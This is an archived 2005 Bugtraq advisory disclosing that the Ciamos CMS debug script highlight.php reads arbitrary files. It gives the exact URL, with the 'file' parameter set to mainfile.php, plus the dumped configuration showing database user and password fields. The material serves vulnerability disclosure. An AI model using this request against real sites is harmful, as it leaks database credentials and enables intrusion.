Ciamos Highlight.php Security Hole(IHS)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ciamos Highlight.php Security Hole(IHS)
From: "Majid NT" <NT@xxxxxxxxxxx>
Date: Sat, 19 Mar 2005 02:24:37 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

********************************************
IHS Iran Hackers Sabotage Public advisory  
by : NT                   NT@xxxxxxxxxxx
********************************************
If You Have CIAMOS Installation Address You Can Use highligh.php Hole 
And Get DataBase Configuration(Name,User,Password)
Tested In CIAMOS
-------------------------------------------
Input This Line To Your Browser AddressBar :

http://targetsite/ciamosinstalation/class/debug/highlight.php?
file=ciamosinstallationpath\mainfile.php&line=151#151

Like This :

http://localhost/ciamos/class/debug/highlight.php?
file=c:\phpdev\www\ciamos\mainfile.php&line=151#151

You See This Result :


1  <?php 
2 /** 
3  *  Ciamos: Simple + Flexible + Advanced Content Management 
4  *  < http://www.ciamos.com > 
5  */ 
6  
7 if ( !defined('CIAMOS_MAINFILE_INCLUDED') ) { 
8     define('CIAMOS_MAINFILE_INCLUDED', true); 
9  
10     // Ciamos physical path 
11     define('SYS_ROOT_PATH', 'c:/phpdev/www/ciamos'); 
12  
13     // Ciamos URL without trailing slash 
14     define('SYS_ROOT_URL', 'http://localhost/ciamos'); 
15  
16     // Folder name for your modules folder 
17     define('SYS_MOD_FOLDER', 'modules'); 
18      
19     // Ciamos database layer 
20     $sysConfig['database'] = 'mysql'; 
21  
22     // Ciamos table prefix 
23     $sysConfig['prefix'] = 'ciamos'; 
24  
25     // Ciamos database host 
26     $sysConfig['dbhost'] = 'localhost'; 
27  
28     // Ciamos database user 
29     $sysConfig['dbuname'] = 'root'; 
30  
31     // Ciamos database password 
32     $sysConfig['dbpass'] = ''; 
33  
34     // Ciamos database name 
35     $sysConfig['dbname'] = 'ciamos'; 
36  
37     // Persistent database connection? 
38     $sysConfig['db_pconnect'] = 0; 
39  
40     // Ciamos default language 
41     $sysConfig['default_language'] = 'english'; 
42  
43     /** 
44      * End edit - do not change anything below this line 
45      */ 
46      
47     if ( (SYS_ROOT_PATH == '') && (@file_exists
('_install/index.php')) ) { 
48         header('Location: _install/index.php'); 
49         exit(); 
50     } 
51     include_once(SYS_ROOT_PATH.'/include/common.php'); 
52 } 
?> 


------------------------------------------

More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
 
Source Advisory:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=15

Found By NT(IHS)
NT@xxxxxxxxxxx
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com


-- 
www.IHSTEAM.com
www.IHSSECURITY.com

Prev by Date: Ciamos Installation path(IHS)
Next by Date: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
Previous by thread: Ciamos Installation path(IHS)
Next by thread: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
Index(es):
- Date
- Thread